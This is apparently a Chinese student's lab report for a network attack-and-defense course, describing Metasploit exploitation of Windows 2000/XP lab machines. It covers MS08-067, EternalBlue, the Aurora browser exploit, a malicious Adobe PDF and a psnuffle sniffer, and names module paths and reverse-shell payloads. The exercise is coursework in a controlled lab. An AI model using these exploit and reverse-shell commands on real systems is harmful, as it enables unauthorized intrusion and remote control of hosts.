• 20192418张曦 202120222 《网络与系统攻防技术》实验6实验报告


    20192418张曦 2021-2022-2 《网络与系统攻防技术》实验6实验报告


    1.实验内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1.1 一个主动攻击实践,尽量使用最新的类似漏洞;

    • MS08-067远程溢出漏洞(shell)
      MS17_010_eternalblue永恒之蓝

    1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

    • ms_10_002(Aurora攻击)

    1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

    • Adobe

    1.4 成功应用任何一个辅助模块。

    • portscan(端口扫描)

    2.实验过程

    2.1 主动攻击实践

    MS08-067远程溢出漏洞(shell)

    MS08_067_netapi在Metasploit中算是很老牌的溢出攻击荷载,使用它攻击win2k系统可以获得一个较高的系统权限。

    攻击主机:kali

    靶机:win2k

    测试ping通情况:

    进入msf

    use exploit/windows/smb/ms08_067_netapi //选择ms08_067漏洞
    set payload generic/shell_reverse_tcp //设置攻击载荷 
    //设置靶机ip地址
    //攻击
    

    攻击成功后获取shell,使用ipconfig即可查看到ip地址为靶机的ip地址。

    MS17_010_eternalblue永恒之蓝

    • (永恒之蓝及浏览器Aurura攻击的截图中攻击机、靶机的ip地址有所不同,因为实验期间虚拟机坏了需要重装,但是图中的虚拟机标签页都能看到学号)

    攻击主机:kali

    靶机:xp

    use auxiliary/scanner/smb/smb_ms17_010,选择本次要攻击漏洞
    use exploit/windows/smb/ms17_010_eternalblue 选择该漏洞
    set payload windows/x64/meterpreter/reverse_tcp 攻击载荷
    设置攻击机、靶机的ip地址,发起攻击

    可以看到靶机确实存在漏洞

    但是无法实施连接

    可能是永恒之蓝主要存在于win7系统中,在本靶机攻击失败,无法获取shell

    2.2 针对浏览器的攻击

    ms14_064

    (这是一次失败的浏览器漏洞攻击)





    最终无法连接

    问题应该是window xp版本的问题,使用的winxp SP3无法回连。

    ms_10_002(Aurora攻击)

    (这个浏览器漏洞攻击成功了)
    use exploit/windows/browser/ms10_002_aurora,利用MSF的Aurora模块攻击xp主机的浏览器并控制主机

    将生成的url通过靶机访问:

    可以看到kali主机成功建立会话

    使用ipconfig,可以看到靶机的ip地址,连接成功

    2.3 一个针对客户端的攻击

    Adobe

    查找adobe漏洞并进行攻击

    看到上面的文件生成位置,找到文件,拷贝到winxp靶机中

    在kali中启动监听模块

    在xp中用adobe reader打开生成的pdf文件

    连接成功

    这里也是使用ipconfig查看连接情况,客户端漏洞攻击成功

    2.4 成功应用任何一个辅助模块

    portscan(端口扫描)

    search sniff //查看嗅探相关攻击
    use auxiliary/sniffer/psnuffle //选择攻击操作
    show options //查看设置
    exploit //攻击
    

    在靶机中尝试进入网站besti.com

    在kali攻击机中可以监听到

    3.问题及解决方案

    • 问题1:电脑太卡了。。甚至做到一半要重装虚拟机

      我的电脑里面xp系统在VMware上卡得离谱,但是virtualbox无法联网,只能在VMware里面卡着一直做

    • 问题1解决方案:。。。。

    • 问题2:主动攻击时没有shell的回连

    • 问题2解决方案:需要安装sp1版本的xp系统

    • 问题3:pdf无法打开

    • 问题3解决方案:需要安装低版本的adobe reader

    4.学习感悟、思考等

    本次实验看似简单,实际遇到的问题非常之多。我用了一早上的时间去攻击五个不同的漏洞,最后只能成功一个。失败的原因多是系统版本不同,无法实现shell的回连。
    在本次的实验中,我对msf的各种模块的使用方法都有了更深的理解,但也认识到了自己的不足,对一些漏洞需要先了解,不能盲目进行攻击。
    想要做好这一次实验,也是需要勤于思考和苦下功夫的,在实践的同时熟练掌握msf的使用技巧,本次实验让我受益匪浅。

  • 相关阅读:
    Byobu(tmux)的使用与定制
    Centos 编译安装Python 2.6
    how to set up the remote accout who to connection and management mysql server
    CentOS安装python2.6以及MySQLpython
    byobu "屏风" 简介 ,以及在CentOS下安装及日常使用
    /bin/rm: cannot remove `libtoolT': No such file or directory
    MySQLpython EnvironmentError: mysql_config not found | InfoEntropy
    几个逼真的页面 watch out
    Emerge详细解释
    微软Internet TV初体验
  • 原文地址:https://www.cnblogs.com/zhangxi2418/p/16260125.html
Copyright © 2020-2023  润新知